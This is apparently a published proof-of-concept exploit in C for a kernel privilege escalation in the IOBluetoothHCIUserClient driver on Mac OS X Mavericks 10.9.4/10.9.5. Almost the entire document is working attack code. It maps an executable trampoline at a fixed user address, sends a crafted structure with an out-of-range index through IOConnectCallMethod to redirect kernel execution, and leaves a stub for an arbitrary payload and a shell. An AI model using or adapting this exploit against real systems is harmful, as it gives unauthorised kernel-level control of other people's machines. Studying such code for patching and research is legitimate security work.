Mac OS X Mavericks IOBluetoothHCIUserClient Privilege Escalation

/*

* pwn.c, by @rpaleari and @joystick

*

* This PoC exploits a missing sign check in

* IOBluetoothHCIUserClient::SimpleDispatchWL().

*

* Tested on Mac OS X Mavericks (10.9.4/10.9.5).

*

* Compile with: gcc -Wall -o pwn{,.c} -framework IOKit

*

*/

#include <stdio.h>

#include <string.h>

#include <mach/mach.h>

#include <mach/vm_map.h>

#include <IOKit/IOKitLib.h>

uint64_t payload() {

/* Your payload goes here. */

}

int main(void) {

/* Map our landing page (kernel will jump at tgt+7) */

vm_address_t tgt = 0x0000048800000000;

vm_allocate(mach_task_self(), &tgt, 0x1000, 0);

vm_protect(mach_task_self(), tgt, 0x1000, 0,

VM_PROT_READ|VM_PROT_WRITE|VM_PROT_EXECUTE);

memset((void *)tgt, 0, 0x1000);

/* Prepare payload */

char *target = (char *)tgt;

/* mov rax, payload */

target[7] = 0x48;

target[8] = 0xb8;

*((uint64_t *)(&target[9])) = (uint64_t) payload;

/* jmp rax */

target[17] = 0xff;

target[18] = 0xe0;

printf(" [+] Payload function @ %016llx\n", (uint64_t) payload);

printf(" [+] Stored trampoline @ %016llx\n", (uint64_t) tgt+7);

/* Find the vulnerable service */

io_service_t service =

IOServiceGetMatchingService(kIOMasterPortDefault,

IOServiceMatching("IOBluetoothHCIController"));

if (!service) {

return -1;

}

/* Connect to the vulnerable service */

io_connect_t port = (io_connect_t) 0;

kern_return_t kr = IOServiceOpen(service, mach_task_self(), 0, &port);

IOObjectRelease(service);

if (kr != kIOReturnSuccess) {

return kr;

}

printf(" [+] Opened connection to service on port: %d\n", port);

/* The first 8 bytes must be 0, so we don't have to handle following

parameters */

char a[] = "\x00\x00\x00\x00\x00\x00\x00\x00"

/* Don't really matter for the exploit (ignored due to the 0s above) */

"\x00\x00\x00\x00\x00\x00\x00\x07\x02\x00\x00\x00\x11\x0a\x00\x00\x03\x72\x00\x00"

"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"

"\x00\x00\x00\x00\x00\x00\x00\x00\xe8\xfa\x2a\x54\xff\x7f\x00\x00\x78\x00\x00\x00"

"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"

"\xa8\xfb\x2a\x54\xff\x7f\x00\x00\xd8\xfa\x2a\x54\xff\x7f\x00\x00\x60\x4a\xb6\x86"

"\x80\xff\xff\xff"

/* Index value 0xfff5b6a8 makes _sRoutines[index] point to an in-kernel

memory area that contains {0x0000048800000007, N}, with 0 <= N < 8. May

need to be adjusted on other Mavericks versions. */

"\xa8\xb6\xf5\xff\x80\xff\xff\xff";

printf(" [+] Launching exploit!\n");

kr = IOConnectCallMethod((mach_port_t) port, /* Connection */

(uint32_t) 0, /* Selector */

NULL, 0, /* input, inputCnt */

(const void*) a, /* inputStruct */

sizeof(a), /* inputStructCnt */

NULL, NULL, NULL, NULL); /* Output stuff */

/* Exec shell here after payload returns */

return IOServiceClose(port);

}